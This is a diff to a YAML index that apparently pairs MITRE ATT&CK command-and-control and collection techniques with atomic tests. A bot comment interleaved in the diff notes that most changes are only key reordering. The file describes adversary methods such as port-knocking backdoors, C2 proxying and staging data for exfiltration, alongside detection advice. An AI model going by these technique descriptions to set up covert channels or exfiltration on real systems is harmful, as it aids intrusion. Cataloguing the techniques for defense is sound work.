+ url: https://attack.mitre.org/techniques/T1205/001
- url: https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
@@ -45294,7 +46772,7 @@ command-and-control:
This technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.
The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
- id: attack-pattern--90410d1b-b01b-4fe9-9cea-c0a3427a419c
+ id: attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -45303,22 +46781,21 @@ command-and-control:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-01-22T20:26:58.120Z'
- created: '2020-01-22T20:26:58.120Z'
- x_mitre_platforms:
- - Linux
- - macOS
+ modified: '2020-07-01T18:23:25.002Z'
+ created: '2020-07-01T18:23:25.002Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: Record network packets sent to and from the system, looking
+ for extraneous packets that do not belong to established flows.
x_mitre_data_sources:
- Netflow/Enclave netflow
- Packet capture
- x_mitre_detection: Record network packets sent to and from the system, looking
- for extraneous packets that do not belong to established flows.
- x_mitre_defense_bypassed:
- - Defensive network service scanning
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1001.003:
technique:
@@ -45349,23 +46826,23 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-15T00:40:27.503Z'
created: '2020-03-15T00:40:27.503Z'
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_data_sources:
- - Packet capture
- - Process use of network
- - Process monitoring
- - Network protocol analysis
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used.(Citation: University of Birmingham C2)'
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Packet capture
+ - Process use of network
+ - Process monitoring
+ - Network protocol analysis
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
atomic_tests: []
T1572:
technique:
@@ -45415,16 +46892,8 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-27T17:15:35.372Z'
created: '2020-03-15T16:03:39.082Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Network protocol analysis
- - Process monitoring
- - Process use of network
- - Netflow/Enclave netflow
- - Packet capture
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
x_mitre_detection: "Monitoring for systems listening and/or establishing external
connections using ports/protocols commonly associated with tunneling, such
as SSH (port 22). Also monitor for processes commonly associated with tunneling,
@@ -45436,13 +46905,26 @@ command-and-control:
expected protocol standards regarding syntax, structure, or any other variable
adversaries could leverage to conceal data.(Citation: University of Birmingham
C2)"
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Network protocol analysis
+ - Process monitoring
+ - Process use of network
+ - Netflow/Enclave netflow
+ - Packet capture
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1090:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ id: attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Proxy
+ description: |-
+ Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
+
+ Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.
external_references:
- source_name: mitre-attack
external_id: T1090
@@ -45455,18 +46937,13 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- description: |-
- Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
-
- Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.
- name: Proxy
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-03-27T17:50:37.638Z'
+ modified: '2020-06-20T20:53:20.670Z'
created: '2017-05-31T21:31:08.479Z'
x_mitre_is_subtechnique: false
x_mitre_platforms:
@@ -45495,7 +46972,7 @@ command-and-control:
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Remote Access Software
description: |-
- An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be whitelisted within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+ An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Remote access tools may be established and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.
@@ -45522,30 +46999,30 @@ command-and-control:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-03-27T18:01:17.681Z'
+ modified: '2020-06-20T20:42:37.320Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '2.0'
- x_mitre_contributors:
- - Matt Kelly, @breakersall
- x_mitre_data_sources:
- - Network intrusion detection system
- - Network protocol analysis
- - Process use of network
- - Process monitoring
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_permissions_required:
+ - User
+ x_mitre_network_requirements: true
x_mitre_detection: |-
Monitor for applications and processes related to remote admin tools. Correlate activity with other suspicious behavior that may reduce false positives if these tools are used by legitimate users and administrators.
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.
[Domain Fronting](https://attack.mitre.org/techniques/T1090/004) may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions.
- x_mitre_network_requirements: true
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - Network intrusion detection system
+ - Network protocol analysis
+ - Process use of network
+ - Process monitoring
+ x_mitre_contributors:
+ - Matt Kelly, @breakersall
+ x_mitre_version: '2.0'
identifier: T1219
atomic_tests:
- name: TeamViewer Files Detected Test on Windows
@@ -45645,25 +47122,25 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-14T23:36:52.095Z'
created: '2020-03-14T23:36:52.095Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Packet capture
- - Process use of network
- - Process monitoring
- - Network protocol analysis
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used.(Citation: University of Birmingham C2)'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Packet capture
+ - Process use of network
+ - Process monitoring
+ - Network protocol analysis
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1132.001
atomic_tests:
- name: Base64 Encoded data.
@@ -45716,23 +47193,23 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-15T00:37:58.963Z'
created: '2020-03-15T00:37:58.963Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Packet capture
- - Process use of network
- - Process monitoring
- - Network protocol analysis
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used.(Citation: University of Birmingham C2)'
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Packet capture
+ - Process use of network
+ - Process monitoring
+ - Network protocol analysis
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1573.001:
technique:
@@ -45760,10 +47237,12 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-26T21:25:37.306Z'
created: '2020-03-16T15:45:17.032Z'
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_detection: |-
+ With symmetric encryption, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures.
+
+ In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)
x_mitre_data_sources:
- SSL/TLS inspection
- Process monitoring
@@ -45771,34 +47250,33 @@ command-and-control:
- Malware reverse engineering
- Netflow/Enclave netflow
- Packet capture
- x_mitre_detection: |-
- With symmetric encryption, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures.
-
- In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
atomic_tests: []
- T1545:
+ T1205:
technique:
+ revoked: false
+ id: attack-pattern--451a9977-d255-43c9-b431-66de80130c8c
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Traffic Signaling
+ description: |-
+ Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
+
+ Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).
+
+ The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
external_references:
- source_name: mitre-attack
- external_id: T1545
- url: https://attack.mitre.org/techniques/T1545
+ external_id: T1205
+ url: https://attack.mitre.org/techniques/T1205
- url: https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Traffic Signaling
- description: |-
- Adversaries may use traffic signaling to hide open ports used for persistence or command and control. Traffic signaling is a well-established method used by both defenders and adversaries to hide open ports from access/discovery. To enable a port, an adversary sends a series of packets with certain characteristics before the port will be opened. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1545/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
-
- This technique has been observed for both the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.
-
- The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
- id: attack-pattern--c2dc4e98-ce10-4af8-866f-2187e84466f4
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -45807,24 +47285,26 @@ command-and-control:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-03-27T20:14:07.431Z'
- created: '2020-01-22T20:18:16.952Z'
+ modified: '2020-07-01T18:27:41.755Z'
+ created: '2018-04-18T17:59:24.739Z'
+ x_mitre_contributors:
+ - Josh Day, Gigamon
+ x_mitre_data_sources:
+ - Packet capture
+ - Netflow/Enclave netflow
+ x_mitre_permissions_required:
+ - User
x_mitre_platforms:
- Linux
- macOS
- x_mitre_data_sources:
- - Netflow/Enclave netflow
- - Packet capture
+ - Windows
+ x_mitre_network_requirements: true
x_mitre_detection: Record network packets sent to and from the system, looking
for extraneous packets that do not belong to established flows.
x_mitre_defense_bypassed:
- Defensive network service scanning
- x_mitre_permissions_required:
- - User
+ x_mitre_version: '2.0'
x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Josh Day, Gigamon
atomic_tests: []
T1071.001:
technique:
@@ -45856,8 +47336,16 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-26T20:15:35.821Z'
created: '2020-03-15T16:13:46.151Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_data_sources:
+ - Network protocol analysis
+ - Process monitoring
+ - Process use of network
+ - Netflow/Enclave netflow
+ - Packet capture
x_mitre_detection: "Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
@@ -45866,16 +47354,8 @@ command-and-control:
syntax, structure, or any other variable adversaries could leverage to conceal
data.(Citation: University of Birmingham C2)\n\nMonitor for web traffic to/from
known-bad or suspicious domains. "
- x_mitre_data_sources:
- - Network protocol analysis
- - Process monitoring
- - Process use of network
- - Netflow/Enclave netflow
- - Packet capture
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1071.001
atomic_tests:
- name: Malicious User Agents - Powershell
@@ -45940,8 +47420,19 @@ command-and-control:
name: sh
T1102:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2017-05-31T21:31:13.915Z'
+ modified: '2020-03-26T23:26:10.297Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ type: attack-pattern
+ id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Web Service
+ description: |-
+ Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
+
+ Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
external_references:
- source_name: mitre-attack
external_id: T1102
@@ -45950,19 +47441,8 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- description: |-
- Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
-
- Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
- name: Web Service
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- modified: '2020-03-26T23:26:10.297Z'
- created: '2017-05-31T21:31:13.915Z'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_platforms:
- Linux
- macOS
@@ -45991,6 +47471,21 @@ command-and-control:
collection:
T1560:
technique:
+ created: '2020-02-20T20:53:45.725Z'
+ modified: '2020-03-29T18:27:31.040Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ type: attack-pattern
+ id: attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a
+ description: |-
+ An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
+
+ Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.
+ name: Archive Collected Data
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1560
@@ -45999,21 +47494,6 @@ collection:
description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
April 22, 2016.
source_name: Wikipedia File Header Signatures
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Archive Collected Data
- description: |-
- An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
-
- Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.
- id: attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-03-29T18:27:31.040Z'
- created: '2020-02-20T20:53:45.725Z'
x_mitre_platforms:
- Linux
- macOS
@@ -46059,6 +47539,23 @@ collection:
cleanup_command: 'Remove-Item -path #{output_file} -ErrorAction Ignore'
T1560.003:
technique:
+ created: '2020-02-20T21:09:55.995Z'
+ modified: '2020-03-25T22:48:14.605Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ type: attack-pattern
+ id: attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b
+ description: 'An adversary may compress or encrypt data that is collected prior
+ to exfiltration using a custom method. Adversaries may choose to use custom
+ archival methods, such as encryption with XOR or stream ciphers implemented
+ with no external library or utility references. Custom implementations of
+ well-known compression algorithms have also been used.(Citation: ESET Sednit
+ Part 2)'
+ name: Archive via Custom Method
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1560.003
@@ -46067,23 +47564,6 @@ collection:
description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
the Comings and Goings. Retrieved November 21, 2016.'
source_name: ESET Sednit Part 2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Archive via Custom Method
- description: 'An adversary may compress or encrypt data that is collected prior
- to exfiltration using a custom method. Adversaries may choose to use custom
- archival methods, such as encryption with XOR or stream ciphers implemented
- with no external library or utility references. Custom implementations of
- well-known compression algorithms have also been used.(Citation: ESET Sednit
- Part 2)'
- id: attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-03-25T22:48:14.605Z'
- created: '2020-02-20T21:09:55.995Z'
x_mitre_platforms:
- Linux
- macOS
@@ -46129,19 +47609,19 @@ collection:
phase_name: collection
modified: '2020-03-29T18:27:30.891Z'
created: '2020-02-20T21:08:52.529Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: |-
Monitor processes for accesses to known archival libraries. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1560.001:
technique:
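Review bot: Every changed line in this hunk is a key reorder of the T1560 technique mapping — `x_mitre_platforms`, `x_mitre_data_sources`, `x_mitre_detection`, `x_mitre_is_subtechnique` and `x_mitre_version` move but keep their values — and the same move-only pattern repeats in nearly every other hunk of this section (T1560.001, T1123, T1119, T1115, T1056.004, T1074, T1530, T1213, T1005, T1039, T1025, T1114). Mapping order carries no meaning in YAML, so this looks like the exporter serializing the upstream STIX objects in arrival order; emitting mappings in a fixed or sorted key order (for example `yaml.dump(..., sort_keys=True)` if the generator is Python, or sorting each technique mapping before dumping) would shrink the diff to the actual upstream ATT&CK changes. Those changes are what a reviewer needs to see and they are buried here: the cloud platform removal for T1005, the updated `modified` timestamps, the new `x_mitre_is_subtechnique` fields, and the description edits for T1119 and T1213. The enclosing `collection:` mapping starts and ends outside the hunk.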
@@ -46177,21 +47657,21 @@ collection:
phase_name: collection
modified: '2020-03-25T21:54:37.374Z'
created: '2020-02-20T21:01:25.428Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_detection: |-
+ Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
+
+ Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)
x_mitre_data_sources:
- Process monitoring
- Process command-line parameters
- File monitoring
- Binary file metadata
- x_mitre_detection: |-
- Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
-
- Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1560.001
atomic_tests:
- name: Compress Data for Exfiltration With Rar
@@ -46465,23 +47945,24 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- modified: '2019-06-18T13:16:53.385Z'
+ modified: '2020-07-14T19:42:10.235Z'
created: '2017-05-31T21:31:34.528Z'
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - API monitoring
- - Process monitoring
- - File monitoring
- x_mitre_detection: |-
- Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.
-
- Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.
- x_mitre_permissions_required:
- - User
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.
+
+ Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.
+ x_mitre_data_sources:
+ - API monitoring
+ - Process monitoring
+ - File monitoring
+ x_mitre_version: '1.0'
identifier: T1123
atomic_tests:
- name: using device audio capture commandlet
@@ -46496,30 +47977,30 @@ collection:
name: powershell
T1119:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1119
- external_id: T1119
+ created: '2017-05-31T21:31:27.985Z'
+ modified: '2020-03-31T22:18:43.019Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ type: attack-pattern
+ id: attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Automated Collection
description: "Once established within a system or network, an adversary may
use automated techniques for collecting internal data. Methods for performing
- this technique could include use of [Scripting](https://attack.mitre.org/techniques/T1064)
+ this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)
to search for and copy information fitting set criteria such as file type,
location, or name at specific time intervals. This functionality could also
be built into remote access tools. \n\nThis technique may incorporate use
of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)
- and [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) to
+ and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to
identify and move files."
- name: Automated Collection
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2019-07-16T19:44:07.942Z'
- created: '2017-05-31T21:31:27.985Z'
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1119
+ external_id: T1119
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_system_requirements:
- Permissions to access directories and files that store information of interest.
x_mitre_platforms:
@@ -46539,12 +48020,13 @@ collection:
access tools with built-in features may interact directly with the Windows
API to gather data. Data may also be acquired through Windows system management
tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
- and [PowerShell](https://attack.mitre.org/techniques/T1086).
+ and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
x_mitre_data_sources:
- File monitoring
- Data loss prevention
- Process command-line parameters
x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
identifier: T1119
atomic_tests:
- name: Automated Collection Command Prompt
@@ -46635,7 +48117,7 @@ collection:
- url: https://msdn.microsoft.com/en-us/library/ms649012
description: Microsoft. (n.d.). About the Clipboard. Retrieved March 29, 2016.
